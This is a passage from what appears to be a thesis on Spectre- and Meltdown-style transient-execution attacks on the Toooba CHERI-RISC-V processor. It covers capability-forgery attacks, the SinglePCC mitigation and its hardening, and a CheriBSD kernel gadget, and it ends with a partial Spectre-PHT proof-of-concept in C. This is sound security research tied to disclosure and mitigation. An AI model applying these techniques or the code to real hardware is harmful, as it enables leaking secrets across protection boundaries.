tially make the results useless because of noise. Another option is to hide the
CBuildCap instruction and the transiently executed instruction sequence in
a speculative frame. This means that I insert a branch instruction before the
2This figure is borrowed from the CHERI team
CHAPTER 5. CHERI-RISC-V RESULTS 55
CBuildCap instruction with a branch target that lies after the second tran-
sient load. The branch instruction needs to be slow to resolve for Toooba,
which can be achieved by making the branch instruction dependent on a load
that misses all caches. I train the branch so that the actual attack code path
will always be predicted to be taken as explained in Section 5.1.1. During the
actual attack, I provide parameters such that the attack code will eventually not
be taken. Therefore, the attack code still is executed speculatively, but the ex-
ception is hidden because of the rollback that Toooba will eventually perform.
This step is combining the CBuildCap attack with a Spectre-PHT attack
as suggested by Lipp et al. [27]. This solves both keeping the process open
and avoiding the invocation of the exception handler because the exception
never occurs on the architectural level. One drawback is that the effective
speculative window for the attacker becomes smaller due to an extra instruction
that has to be executed before the actual attack code. However, this proves to
be no problem in Toooba and I have successfully crafted this variant of the
CBuildCap attack.
Another mechanism proposed in [27] is the use of transactional memory.
If a failure occurs in a sequence of memory accesses that are made transac-
tional by the architecture, all operations in that transaction will be rolled back.
However, effects to the cache might have already taken place and secrets can
be leaked therefore. RISC-V mentions the Standard Extension for Transac-
tional Memory. However, this has not been specified yet [11]. Therefore, this
cannot be used on RISC-V architectures to hide an exception.
CSetBounds
This attack is comparable to the CBuildCap attack presented above. The
goal of the attack is to extend the bounds of a capability, which breaks the
monotonicity constraint of CHERI capabilities. The CSetBounds instruc-
tion sets the bounds of a capability while ensuring monotonicity. If the new
value for the bounds is greater than the value so far, an exception will be
raised [37]. The attack is performed the same way the CBuildCap attack
was performed. A load that misses all caches – or any instruction that intro-
duces a delay long enough – enables the transient-execution sequence to take
effect before the exception caused by the CSetBounds instruction is raised.
The transient-execution sequence comprises the following steps: setting the
address to a value of interest for the attacker, accessing that value, and finally
accessing an attacker-visible array with the secret as the index in order to leak
the secret.
56 CHAPTER 5. CHERI-RISC-V RESULTS
Analogous to the CBuildCap attack, the CSetBounds attack will raise
an exception in the form presented above. As explained, hiding the exception
in a speculative frame is the best option for an attacker. I have successfully
implemented both a variant that eventually raises a hardware exception and a
variant that hides the exception.
CInvoke
Both the CBuildCap and the CSetBounds attack operate on conventional
unsealed data capabilities. In contrast, this attack works on sealed capabilities.
Sealed capabilities cannot be dereferenced and thus are not of great use to an
attacker. Therefore, it is the attacker’s goal to unseal this data capability and
access the memory addresses it grants access to. Since sealed capabilities
cannot be dereferenced, it is deemed secure to pass them to non-trustworthy
processes. This way, an attacker can get access to a sealed data capability.
The CInvoke instruction was designed to allow fast jumps between pro-
tection domains. This is enabled by having a sealed code capability to the code
the user wants to jump to and by a sealed data capability – these two capabili-
ties together form a pair of capabilities. CInvoke unseals the code capability
and jumps to it. Furthermore, it unseals the data capability and moves it into a
general purpose capability register. In order to be considered a valid operation,
CInvoke needs to pass many checks, e.g. both capabilities need to be tagged
and sealed. In my scenario, I primarily attack the fact that the capability pair
is required to have the same otype. However. I violate multiple other in-
variants as well [37]. A failure of these checks will lead to an exception being
raised by Toooba.
My approach for the attack is to use a code capability that points to a gadget
in the attackers code space. For the data capability, I use a powerful sealed
capability that the attacker does not have a suitably authorising capability to
unseal. The CInvoke instruction is executed with these two capabilities as
parameters. In order to delay the exception being raised, a load missing all
caches is used again. With the exception being delayed, the code speculatively
jumps to the attacker’s chosen gadget and the data capability is unsealed and
forwarded. The gadget loads the secret and reveals it by a second transient
load. Hiding the exception in a speculative frame is again the best way of
conducting this exploit from an attacker’s perspective.
CHAPTER 5. CHERI-RISC-V RESULTS 57
CUnseal
Similar to the attack above, the goal of this attack is to unseal a capability
without having the necessary privileges. The CUnseal instruction requires
two parameters: the capability to be unsealed and the capability authorising
this. If the CUnseal instruction fails, a hardware exception will be raised.
For CUnseal, there are multiple reasons why this instruction can fail – in my
attack I focus on a TypeViolation. This is caused if the otype of the sealed
capability is not equal to the address of the authorising capability [37]. Again,
in my attack scenario, the attacker has already obtained a powerful sealed data
capability or can obtain it when needed, e.g., reading from shared memory
with another process running on the CHERI system.
The actual attack approach is similar to the CInvoke attack. The attacker
does not possess a suitable capability that allows unsealing the powerful data
capability. In order to delay the exception being raised, the attacker performs a
load with a great miss penalty. Toooba’s forwarding again enables a transient-
execution sequence to make a secret visible to the attacker. If an attacker wants
to conduct the attack more than once, hiding the exception in a speculative
execution frame is the best solution.
Chapter 6
Discussion
One of the main goals of this thesis work is to contribute a platform to foster
research of transient-execution attacks both on RISC-V and CHERI-RISC-V
processors. The experiments presented in Chapters 4 and 5 show vulnera-
bilities being present in Toooba and the need to develop and deploy mitiga-
tion mechanisms. In this chapter, I describe how my framework impacted the
CHERI team and helped to develop and improve SinglePCC – a mitigation
mechanism against Spectre-style attacks in CHERI-RISC-V Toooba. Further-
more, my work has triggered initial plans for Meltdown-CF mitigation.
6.1 SinglePCC
The SinglePCC mechanism has been mainly developed by Jonathan Woodruff
and was inspired by my experiments and their results as all Spectre-style at-
tacks were found to violate CHERI’s security model.
6.1.1 Mechanism
As of now, CHERI-RISC-V Toooba uses the entire PCC of the target for branch
prediction, which means that both the actual address and also the privileges
including the bounds are predicted. SinglePCC removes the privileges com-
pletely from the prediction. In order to determine whether an instruction is in
bounds, it uses the PCC bounds of the last committed instruction. Whenever
an instruction that changes the bounds, e.g., a cjalr instruction is executed,
the bounds will be changed at well. The BTB or RSB only carry the address
and no bounds or other privileges any longer. If the address of an instruc-
tion is out-of-bounds of the current bounds, e.g., a target of a jump to another
58
CHAPTER 6. DISCUSSION 59
compartment, this instruction has to wait until its bounds can be derived from
the current register state without speculation. This approach will decrease the
overall system performance as additional pipeline flushes can be included by
waiting for the bounds to be in the register state, but this approach does not
allow any speculation over compartment boundaries.
6.1.2 Testing SinglePCC
I ran all major Spectre-style attacks on the branch of Toooba that has been ex-
tended with SinglePCC. The results are summarised in Table 6.1. SinglePCC
successfully mitigates attacks that target injecting an address into the BTB or
RSB that is located at an address out-of-bounds of the PCC for this compart-
ment or part of the code, e.g., a function whose PCC is exactly limited to its
respective code. A jump to another compartment is possible – but not in spec-
ulation. This leads to the fact that the attacker chosen gadget will never be
executed. However, SinglePCC does not mitigate the following attack case: I
assume to have two identical compartments that only differ in having different
ASIDs. Furthermore, one compartment is under control of the attacker, the
other compartment is benign. The compartment under attacker control can
inject an entry into the BTB or RSB and when the benign compartment is ex-
ecuted the next time, it will follow the misprediction. Capabilities describe
virtual addresses, but do not contain any information about address spaces.
SinglePCC mandates that the address in speculation must be in the current
bounds, but this does not forbid this case of cross protection domain training
because SinglePCC does not know about the different address spaces.
Furthermore, SinglePCC does not mitigate Spectre-PHT nor does it mit-
igate Spectre-STL-Load. In the case of Spectre-PHT, the attacker only mis-
trains the branch prediction direction, but both the target in case of taken and
the target in case of not taken are in the current bounds, which means that
SinglePCC does not take effect here. For Spectre-STL-Load, the reason is
similar. This attack loads a stale memory value, but it does not affect branch
targets and therefore the address always stays within the current bounds. How-
ever, SinglePCC mitigates Spectre-STL-Jump if the jump goes out-of-bounds
for the same reasons as SinglePCC mitigates Spectre-BTB and Spectre-RSB.
Last, SinglePCC only mitigates attacks that involve jumping. Therefore, Sin-
glePCC does not mitigate any of the Meltdown-CF attacks.
With SinglePCC enabled, an attacker cannot train the BTB with targets
outside of the bounds of the current PCC. However, the attacker can train the
BTB with targets in bounds. In the case the current bounds are not tight, this
60 CHAPTER 6. DISCUSSION
asm CHERI asm
Spectre-PHT ✓ ✓
Spectre-BTB ✓ ✗
Spectre-RSB ✓ ✗
Spectre-STL-Load ✓ ✓
Spectre-STL-Jump ✓ ✗
Table 6.1: Overview of attempted Spectre-style attacks and whether they were
successful when SinglePCC is applied.
gives the attacker a higher probability to find a suitable gadget in the victim’s
code.
6.1.3 Hardening SinglePCC
Running the Spectre-style transient-execution attacks in Toooba with
SinglePCC being enabled revealed a dangerous vulnerability in the initial Sin-
glePCC implementation. My example of Spectre-RSB worked even though
the return address injected into the RSB was out-of-bounds of the current
PCC of the victim. This could be traced back to an error in the microarchi-
tecture in collaboration with Jonathan Woodruff. In my example, the victim
PCC starts at address 0x80040000, whereas the attacker PCC starts at address
0x80080000. The entire PCCs of the victim (PCCv) and the attacker (PCCa)
are:
PCCv = 0xffff200000018004_0000000080040000 (6.1)
PCCa = 0xffff200000018004_0000000080080000 (6.2)
In order to understand the error in the microarchitecture, I need to ex-
plain CHERI Concentrate [38] – the compression mechanism used in order
to achieve 128-bit capabilities. As depicted in Figure 6.1, CHERI Concen-
trate divides the memory space into three different parts from the view of one
capability: the unrepresentable region, the representable space, and the deref-
erenceable region.
In the erroneous SinglePCC implementation, Toooba pulled the address
from the RSB and then applied a function that adds the bounds of the current
PCC. In order to improve overall performance – to shorten the critical path
CHAPTER 6. DISCUSSION 61
base
address
top
Unrepresentable region
Representable space
Dereferenceable region
Figure 6.1: Memory regions implied by the CHERI Concentrate encoding.
Taken and adapted from Woodruff et al. [38].
– the implementors used a function that sets the address, but does not check
whether the address is representable. This function is unsafe, but superior
to its safe counterpart in terms of performance. Because of the alignment of
the victim and attacker PCC, they have the same encoding through CHERI
Concentrate. PCCv and PCCa differ only in the actual address, but the com-
pressed bounds bits are identical. In general, CHERI Concentrate can have
multiple memory regions whose bounds are encoded with the same bit pat-
tern – all these capabilities only differ in the actual address. The unsafe set of
the address leads to the fact that the attacker address pulled from the RSB is
considered in bounds. Therefore, the bounds check following the address set-
ting function will not fail and Toooba will speculatively jump to the attacker’s
gadget and therefore the entire attack succeeds.
My findings caused the SinglePCC implementation to be reviewed and
changed accordingly. A more costly but safe function for setting the address
coming from the RSB is used in the current design. This function will check
whether the address is in the unrepresentable region and this fact will cause
the function to strip the capability’s tag bit in my attack case. In turn, this
invalid capability will not pass the bounds checks and therefore Toooba will
not speculatively jump to this address – as it is intended to work.
Later, Woodruff implemented another approach that decodes the bounds
of the current PCC and writes them to hardware registers. These bounds are
then used for comparing against addresses coming from the BTB and RSB.
Only in case of a jump that is architecturally taken, these bounds registers will
change.
62 CHAPTER 6. DISCUSSION
ld a0, 1000(s5)
ld a1, 208(a0)
add a0, zero, s1
jalr ra, a1
Figure 6.2: CheriBSD kernel code that is suitable for a Spectre-BTB attack.
6.1.4 Spectre-BTB in Kernel Code
In order to confirm the need for mechanisms that mitigate Spectre-style at-
tacks, I present a possible vulnerability that would allow to bypass CHERI’s
security measures in a real-world environment. In this section, I describe the
possible attack of a CHERI system using the presence of an operating system –
in this case CheriBSD. In this attack scenario, I use the hybrid-kernel version
of CheriBSD, which means that the kernel itself does not use capabilities for
its code and data, but the kernel fully enables user-space programs to do so.
In Figure 6.2, I show a short snippet of the CheriBSD kernel code for han-
dling exceptions. The reader may note that this code is not CHERI-RISC-V
assembly, but conventional RISC-V assembly. This is caused by the fact that
the kernel itself does not use capabilities. This code is part of the syscal-
lenter function, which is indirectly called by the do_trap_user function
– the function that handles exceptions coming from U privilege mode. The
code depicted in Figure 6.2 fulfills all the criteria in order to be exploitable
for a Spectre-BTB attack. As described in Section 5.1.3, the goal of the at-
tacker is to alias an indirect jump, which is in this example jalr ra, a1.
Furthermore, the attacker has to ensure that load operation writing into a1 is
delayed, e.g., by making it miss all caches. This will lead to a misspeculation
to the attacker’s gadget that has been injected to the BTB previously.
This kind of attack is a large threat to CHERI systems as it gives attack-
ers powerful capabilities normally used by the kernel. The attacker could at-
tempt to find a powerful capability, e.g., derived from a SCR or a CSR, that
still is in the register state from calls to previous functions. However, the fact
that the kernel is not using capabilities gives the attacker another option to
conduct impactful attacks. For memory operations not issued through capa-
bilities, CHERI systems implicitly use the DDC register. In order to satisfy
the wide range of memory accesses performed by the kernel, the capability in
DDC has to be suitably powerfully configured. In case of an attack, the DDC
register can be used by attackers as well and gives them plenty of options to
attack CheriBSD’s kernel through Spectre-BTB attacks.
CHAPTER 6. DISCUSSION 63
As presented in Section 6.1.2, SinglePCC will mitigate attacks that are
based on Toooba misspeculating to another compartment. In order to success-
fully mititgate the attack above, SinglePCC requires the bounds for the kernel
PCC to be tightly bound. If this is not the case, SinglePCC will not mitigate
this attack as no out-of-bounds jump will be detected. Therefore, this example
illustrates again how important it is for the overall security of a CHERI system
to be configured with the principle of least privilege. Furthermore, it shows
the importance of the framework I created during my work.
6.2 Preventing Meltdown-CF
The Meltdown-CF attacks explained in Section 5.2.3 pose a large threat to
CHERI systems. The analysis presented in this work inspired CHERI hard-
ware designers to propose solutions that are outlined in the following para-
graphs. All Meltdown-style attacks are caused by exceptions not being raised
at the right point of time in the pipeline, which leads to illegal data being
forwarded and used in transient-execution sequences. As explained in Sec-
tion 2.4.5, CHERI implementations need to prevent Meltdown-CF attacks.
This can be done both architecturally and microarchitecturally.
Jonathan Woodruff and Peter Rugg proposed in several personal meetings
that the ISA could be changed such that instructions in the Meltdown-CF sub-
class no longer throw hardware exceptions, but instead forward invalid capa-
bilities in case of a failure. This will entirely prevent transient-execution from
taking effect as memory operations through invalid capabilities are not allowed
and will lead to a hardware exception in Toooba.
Furthermore, Woodruff and Rugg presented the idea of changing the mi-
croarchitecture only without adjusting the ISA. They propose to not write any
capability to the physical register file that exceeds the privileges of its operands
even if only used in a transient path. This will prevent any privilege escalation.
Both approaches have a common denominator as the capability checks
need to be resolved before writing any value to the physical register file. Wood-
ruff and Rugg state further that this will not have a performance impact on
CUnseal and CInvoke, but it will cost performance for the CBuildCap and
CSetBounds instructions due to capability compression being on the ciritical
path.
64 CHAPTER 6. DISCUSSION
6.3 Ethics and Sustainability
When conducting attacks for scientific reason, it has to be ensured that both no
harm to real-world systems is done and that the attack is responsibly disclosed.
Responsible disclosure means that the attackers wait a period of time before
disclosing the vulnerability such that affected systems have enough time to take
measures. Publications about transient-execution attacks followed these prin-
ciples from the beginning [22, 27]. I complied with these principles through-
out my thesis work as well. Whilst performing my attacks, I only operated on
a simulation running on a server and therefore did no harm to any real-world
system. Toooba is a research processor in development whose purpose is to
enable security research. Therefore, I can disclose the found vulnerabilities
immediately with the publication of this thesis. One goal of this thesis was to
provide a platform for further research on these attacks.
Another goal was to show the possibility for transient-execution attacks.
As described in previous sections in this chapter, my research has led to initial
mitigation mechanisms being put in place in Toooba. This will inspire hard-
ware designers to develop more sophisticated mitigation mechanisms that will
strengthen CHERI’s security claims. The computer science society is now
aware that transient-execution attacks affect many microarchitectures and that
mitigation mechanisms are crucial.
A point often overlooked is sustainability. Modern computing can help to
sustainably use resources, e.g., smart irrigation systems. However, all systems
need computing power in order to make decisions that benefit sustainability.
My research will lead to CHERI systems becoming more secure. CHERI’s
strong security claims will remove concerns about security and therefore foster
the use of CHERI in sustainable systems.
6.4 Future Work
This thesis work answered the question of whether transient-execution attacks
are possible in Toooba and CHERI systems in general. However, many ques-
tions still remain unanswered – especially regarding more advanced transient-
execution attacks running in a real-world environment. Currently, Toooba is
fairly conservative and is not yet instantiated with a multi-core setup. This ef-
fectively mitigates advanced transient-execution attacks, but also significantly
limits performance. Changes on a per core basis, e.g., adding sophisticated
data-value speculation to the processor will enrich the microarchitectural state,
CHAPTER 6. DISCUSSION 65
which will give an attacker plenty of options to attempt transient-execution at-
tacks on a RISC-V or CHERI-RISC-V system. This means that future work
will aim to improve Toooba’s performance and evaluate whether a richer mi-
croarchitectural state leads to the possibility of sophisticated transient-execution
attacks.
It is not yet clear how CHERI capabilities interact with transient-execution
attacks. For the most cases, capabilities are an obstacle for an attacker, but they
can be of advantage as well. Considering a single-address-space operating sys-
tem as proposed in [37], speculative bounds escalation can pose a large threat
to CHERI systems as the CBuildCap attack example has shown. It has to be
researched whether there exist other ways to escalate privilege in speculation.
Furthermore, other interactions in a full operating system environment are of
interest to the attacker, e.g. achieving longer load miss penalties by creating
TLB misses. Besides the feasibility of an attack, the quality of possible attacks
has to be investigated. CHERI-RISC-V systems differ in instruction sequences
from conventional RISC-V systems and are likely to introduce noise, e.g., ca-
pababilities have to be loaded from a capability table first. These loads can
impact cache traces and therefore can change the transmission rates in real-
word attacks.
In general, my work has looked at Toooba only in simulation through veri-
lator. An instance of Toooba being synthesised to a Field Programmable Gate
Array (FPGA) will bring new insights and make the results more robust. Fur-
thermore, it would be interesting to conduct research on transient-execution
attacks on the ARM Morello architecture [49]. The different design choices
and the different underlying ISA will likely have an impact on which attacks
are successful and what their respective quality is.
Chapter 7
Conclusions
In this work, I performed initial research on transient-execution attacks on
the superscalar out-of-order CHERI-RISC-V microprocessor Toooba. I can
clearly answer the question of whether Toooba is vulnerable to transient-execu-
tion attacks in the affirmative. In both RISC-V and CHERI-RISC-V assembly,
I could successfully conduct transient-execution attacks. This work was the
first to completely reproduce the major transient-execution attacks on a RISC-
V processor and it was the first work to attempt attacks of this class against
CHERI capability protection. I find that transient-execution attacks violate
CHERI’s security model in two ways and therefore require mitigation and pre-
vention mechanisms to be put into place. First, control-flow can be hijacked
through Spectre-BTB and Spectre-RSB allowing attackers to direct control to
their chosen gadgets in speculation. Second, Meltdown-Capability-Forgery
poses a large vulnerability as attackers can transiently escalate privilege. I
showed that both subclasses of transient-execution result in a large threat to
code running on Toooba. I believe that both attack classes can be prevented or
mitigated by security mechanisms currently being developed. However, I be-
lieve that further findings have yet to be made about transient-execution attacks
on CHERI-RISC-V microprocessors. I further think that transient-execution
attacks will significantly impact threat models and hardware design of any mi-
croarchitecture in the future, and especially capability systems as they assure
high security measures. This work builds the basis for advanced research on
transient-execution attacks on RISC-V microprocessors. Furthermore, it sets
the stage for a first generation of commercial CHERI microprocessors to en-
sure that CHERI’s strong architectural guarantees are also non-bypassable in
speculation.
66
Bibliography
[1] The MITRE Corporation. CVE-2014-0160. https://cve.mitre.
org/cgi-bin/cvename.cgi?name=CVE-2014-0160. 2013.
[2] Trevor Jim et al. “Cyclone: A Safe Dialect of C”. In: Proceedings of
the General Track of the Annual Conference on USENIX Annual Tech-
nical Conference. ATEC ’02. USA: USENIX Association, June 2002,
pp. 275–288. isbn: 1880446006.
[3] George C. Necula, Scott McPeak, and Westley Weimer. “CCured: Type-
Safe Retrofitting of Legacy Code”. In: Proceedings of the 29th ACM
SIGPLAN-SIGACT Symposium on Principles of Programming Languages.
POPL ’02. Portland, Oregon: Association for Computing Machinery,
Jan. 2002, pp. 128–139.
[4] Archibald Samuel Elliott et al. “Checked C: Making C Safe by Ex-
tension”. In: 2018 IEEE Cybersecurity Development (SecDev). Cam-
bridge, MA, USA, Sept. 2018, pp. 53–60.
[5] Thomas Bourgeat et al. “MI6: Secure Enclaves in a Speculative Out-of-
Order Processor”. In: Proceedings of the 52nd Annual IEEE/ACM In-
ternational Symposium on Microarchitecture. MICRO ’52. Columbus,
OH, USA: Association for Computing Machinery, Oct. 2019, pp. 42–
56.
[6] Marno van der Maas and Simon W. Moore. “Protecting Enclaves from
Intra-Core Side-Channel Attacks through Physical Isolation”. In: Pro-
ceedings of the 2nd Workshop on Cyber-Security Arms Race. CYSARM’20.
Virtual Event, USA: Association for Computing Machinery, Nov. 2020,
pp. 1–12.
[7] Maurice V. Wilkes and Roger M. Needham. The Cambridge CAP Com-
puter and Its Operating System. Elsevier, Jan. 1979.
67
68 BIBLIOGRAPHY
[8] William B. Ackerman and William W. Plummer. “An implementation
of a multiprocessing computer system”. In: SOSP ’67: Proceedings of
the First ACM Symposium on Operating System Principles. New York,
NY, USA: ACM, 1967, pp. 5.1–5.10.
[9] Dmitry Evtyushkin et al. “BranchScope: A New Side-Channel Attack
on Directional Branch Predictor”. In: Proceedings of the Twenty-Third
International Conference on Architectural Support for Programming
Languages and Operating Systems. ASPLOS ’18. Williamsburg, VA,
USA: Association for Computing Machinery, Mar. 2018, pp. 693–707.
[10] Krste Asanović and David A. Patterson. Instruction Sets Should Be Free:
The Case For RISC-V. Tech. rep. UCB/EECS-2014-146. University of
California at Berkeley, Electrical Engineering and Computer Sciences,
Aug. 2014.
[11] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction
Set Manual. Document Version 20191213. Volume I: User-Level ISA.
RISC-V Foundation. Dec. 2019.
[12] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction
Set Manual. Document Version 20190608-Priv-MSU-Ratified. Volume
II: Privileged Architecture. RISC-V Foundation. June 2019.
[13] Robert M. Tomasulo. “An Efficient Algorithm for Exploiting Multiple
Arithmetic Units”. In: IBM Journal of Research and Development 11.1
(1967), pp. 25–33.
[14] David A. Patterson and John L. Hennessy. Computer Organization and
Design, RISC-V Edition: The Hardware/Software Interface. 6th. San
Francisco, CA, USA: Morgan Kaufmann Publishers Inc., 2017. isbn:
9780128122754.
[15] John L. Hennessy and David A. Patterson. Computer Architecture: A
Quantitative Approach. 6th. San Francisco, CA, USA: Morgan Kauf-
mann Publishers Inc., 2017. isbn: 9780128119068.
[16] David M. Gallagher et al. “Dynamic Memory Disambiguation Using
the Memory Conflict Buffer”. In: Conference on Architectural Support
for Programming Languages and Operating Systems. San Jose, CA,
USA, Oct. 1994.
[17] Martin Schwarzl et al. Speculative Dereferencing of Registers: Reviving
Foreshadow. Aug. 2020. arXiv: 2008.02307.
BIBLIOGRAPHY 69
[18] Yuval Yarom and Katrina Falkner. “FLUSH+RELOAD: A High Res-
olution, Low Noise, L3 Cache Side-Channel Attack”. In: USENIX Se-
curity Symposium. San Diego, CA: USENIX Association, Aug. 2014,
pp. 719–732.
[19] Claudio Canella et al. “A Systematic Evaluation of Transient Execution
Attacks and Defenses”. In: Proceedings of the 28th USENIX Conference
on Security Symposium. SEC’19. Santa Clara, CA, USA: USENIX As-
sociation, Aug. 2019, pp. 249–266.
[20] Jo Van Bulck et al. “LVI: Hijacking Transient Execution through Mi-
croarchitectural Load Value Injection”. In: 2020 IEEE Symposium on
Security and Privacy (SP). San Francisco, CA, USA, 2020, pp. 54–72.
[21] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-
structions (CHERI): Notes on the Meltdown and Spectre Attacks. Tech.
rep. UCAM-CL-TR-916. University of Cambridge, Computer Labora-
tory, Feb. 2018. url: https://www.cl.cam.ac.uk/techreports/
UCAM-CL-TR-916.pdf.
[22] Paul Kocher et al. “Spectre Attacks: Exploiting Speculative Execution”.
In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA,
May 2019.
[23] Esmaeil Mohammadian Koruyeh et al. “Spectre Returns! Speculation
Attacks Using the Return Stack Buffer”. In: Proceedings of the 12th
USENIX Conference on Offensive Technologies. WOOT’18. Baltimore,
MD, USA: USENIX Association, Aug. 2018.
[24] Giorgi Maisuradze and Christian Rossow. “Ret2spec: Speculative Exe-
cution Using Return Stack Buffers”. In: Proceedings of the 2018 ACM
SIGSAC Conference on Computer and Communications Security. CCS
’18. Toronto, Canada: Association for Computing Machinery, Jan. 2018,
pp. 2109–2122.
[25] Jan Horn. speculative execution, variant 4: speculative store bypass.
https://bugs.chromium.org/p/project-zero/issues/
detail?id=1528. Feb. 2018.
[26] Stephan Van Schaik et al. “RIDL: Rogue In-Flight Data Load”. In: IEEE
Symposium on Security and Privacy. San Francisco, CA, USA, May
2019.
[27] Moritz Lipp et al. “Meltdown: Reading Kernel Memory from User Space”.
In: Commun. ACM (May 2020), pp. 46–56.
70 BIBLIOGRAPHY
[28] Jo Van Bulck et al. “Foreshadow: Extracting the Keys to the Intel SGX
Kingdom with Transient Out-of-Order Execution”. In: 27th USENIX
Security Symposium (USENIX Security 18). Baltimore, MD: USENIX
Association, 991–1008.
[29] Intel Corporation. Intel® Software Guard Extensions Developer Guide.
https://software.intel.com/content/www/us/en/
develop/documentation/sgx-developer-guide/top.
html. Sept. 2016.
[30] Intel Corporation. Deep Dive: Intel Analysis of L1 Terminal Fault. Tech.
rep. 2018. url: %5Curl%7Bhttps://software.intel.com/
security- software- guidance/advisory- guidance/
l1-terminal-fault%7D.
[31] Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Ab-
straction with Transient Out-of-Order Execution. Tech. rep. 1.0. Aug.
2018, p. 7. url: https://foreshadowattack.eu/foreshadow-
NG.pdf.
[32] Arm Limited. Cache Speculation Side-channels. Tech. rep. 2.5. 2020,
p. 21. url: https://developer.arm.com/support/arm-
security-updates/speculative-processor-vulnerability.
[33] Intel Corporation. Intel Analysis of Speculative Execution Side Chan-
nels. Tech. rep. 4.0. 2018, p. 16. url: https://www.intel.com/
content/www/us/en/architecture-and-technology/
intel-analysis-of-speculative-execution-side-
channels-paper.html.
[34] Vladimir Kiriansky and Carl Waldspurger. Speculative Buffer Overflows:
Attacks and Defenses. 2018. arXiv: 1807.03757 [cs.CR].
[35] Dag Arne Osvik, Adi Shamir, and Eran Tromer. “Cache Attacks and
Countermeasures: The Case of AES”. In: Proceedings of the 2006 The
Cryptographers’ Track at the RSA Conference on Topics in Cryptology.
CT-RSA’06. San Jose, CA: Springer-Verlag, 2006, pp. 1–20.
[36] Arm Limited. Arm v8.5-A CPU updates. https://developer.
arm.com/support/arm-security-updates/speculative-
processor-vulnerability. Version 1.4. June 2019.
BIBLIOGRAPHY 71
[37] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-
structions: CHERI Instruction-Set Architecture (Version 8). Tech. rep.
UCAM-CL-TR-951. University of Cambridge, Computer Laboratory,
Oct. 2020. url: https://www.cl.cam.ac.uk/techreports/
UCAM-CL-TR-951.pdf.
[38] Jonathan Woodruff et al. “CHERI Concentrate: Practical Compressed
Capabilities”. In: IEEE Transactions on Computers 68.10 (2019), pp. 1455–
1469.
[39] Brooks Davis et al. CheriABI: Enforcing valid pointer provenance and
minimizing pointer privilege in the POSIX C run-time environment.
Tech. rep. UCAM-CL-TR-932. University of Cambridge, Computer Lab-
oratory, Apr. 2019. url: https://www.cl.cam.ac.uk/techreports/
UCAM-CL-TR-932.pdf.
[40] Hongyan Xia et al. “CheriRTOS: A Capability Model for Embedded
Devices”. In: 2018 IEEE 36th International Conference on Computer
Design (ICCD). Orlando, FL, USA: IEEE Computer Society, Oct. 2018,
pp. 92–99.
[41] David Kaplan, Jeremy Powell, and Tom Woller. AMD SEV-SNP: Strength-
ening VM Isolationwith Integrity Protection and More. Tech. rep. Ad-
vanced Micro Devices Inc., Jan. 2020. url: https://www.amd.
com/system/files/TechDocs/SEV-SNP-strengthening-
vm-isolation-with-integrity-protection-and-more.
pdf.
[42] Abraham Gonzalez et al. “Replicating and Mitigating Spectre Attacks
on a Open Source RISC-V Microarchitecture”. In: Third Workshop on
Computer Architecture Research with RISC-V. Phoenix, AZ, USA, June
2019.
[43] Christopher Celio, David A. Patterson, and Krste Asanović. The Berke-
ley Out-of-Order Machine (BOOM): An Industry-Competitive, Synthe-
sizable, Parameterized RISC-V Processor. Tech. rep. UCB/EECS-2015-
167. University of California at Berkeley, Electrical Engineering and
Computer Sciences, June 2015.
[44] Anh-Tien Le et al. “Experiment on Replication of Side Channel Attack
via Cache of RISC-V Berkeley Out-of-Order Machine (BOOM) Im-
plemented on FPGA”. In: Fourth Workshop on Computer Architecture
Research with RISC-V (CARRV 2020). Valencia, Spain, May 2020.
72 BIBLIOGRAPHY
[45] Arm Limited. Vulnerability of Speculative Processors to Cache Tim-
ing Side-Channel Mechanism. https://developer.arm.com/
support/arm-security-updates/speculative-processor-
vulnerability. 2020.
[46] Sizhou Zhang et al. “Composable Building Blocks to Open up Proces-
sor Design”. In: 2018 51st Annual IEEE/ACM International Symposium
on Microarchitecture (MICRO). Fukouka, Japan, Oct. 2018, pp. 68–81.
[47] Zhen Hang Jiang and Yunsi Fei. “A novel cache bank timing attack”. In:
2017 IEEE/ACM International Conference on Computer-Aided Design
(ICCAD). Irvine, CA, USA, Nov. 2017, pp. 139–146.
[48] Hovav Shacham. “The Geometry of Innocent Flesh on the Bone: Return-
into-Libc without Function Calls (on the X86)”. In: Proceedings of
the 14th ACM Conference on Computer and Communications Security.
CCS ’07. Alexandria, Virginia, USA: Association for Computing Ma-
chinery, 2007, pp. 552–561.
[49] Arm Limited. Arm Architecture Reference Manual Supplement Morello
for A-profile Architecture. DDI0606. Arm Limited. Sept. 2020.
Appendix A
Full C Attack
/*
* Author: Franz Fuchs
*
* Spectre-PHT proof of concept version
*
* spec_funct first checks the array bounds
* and then loads the value determined by the
* index. By training the Pattern History Table
* with 16 calls to the function with valid indexes,
* we trick Toooba in speculatively executing
* the loads even though the index is out of bounds.
*/
#ifdef __CHERI_PURE_CAPABILITY__
#include "pure_cap.h"
#endif
#define MEM_SIZE 16384
#define MEM_SIZE_DW MEM_SIZE/8
#define STACK_SIZE 2048
#define STACK_SIZE_DW STACK_SIZE/8
#define PROBE_SIZE 2048
#define PROBE_SIZE_DW PROBE_SIZE/8
#define SEC_ARR_SIZE 128
#define SEC_ARR_SIZE_DW SEC_ARR_SIZE/8
#define FLUSH_ARR_SIZE 16384
73
74 APPENDIX A. FULL C ATTACK
#define FLUSH_ARR_SIZE_DW FLUSH_ARR_SIZE/8
long int mem[MEM_SIZE_DW];
long int buffer[FLUSH_ARR_SIZE_DW];
long int stack[STACK_SIZE_DW];
long int flush_arr[FLUSH_ARR_SIZE_DW];
// array with secrets that may not
// be overflowed
long int* sec_arr_1[SEC_ARR_SIZE_DW];
long int* sec_arr_2[SEC_ARR_SIZE_DW];
long int size = 16;
int main();
void fill_sec_arr();
void probe();
long int spec_funct(long int index);
void flush();
extern void _init_sp(void);
int main()
{
// write to stack in order to
// not out-optimize this
stack[0] = 0;
size = 16;
fill_sec_arr();
// train the pattern history table of the
// speculative function
flush_arr[0x0] = spec_funct(0x0);
flush_arr[0x1] = spec_funct(0x1);
flush_arr[0x2] = spec_funct(0x2);
flush_arr[0x3] = spec_funct(0x3);
flush_arr[0x4] = spec_funct(0x4);
flush_arr[0x5] = spec_funct(0x5);
APPENDIX A. FULL C ATTACK 75
flush_arr[0x6] = spec_funct(0x6);
flush_arr[0x7] = spec_funct(0x7);
flush_arr[0x8] = spec_funct(0x8);
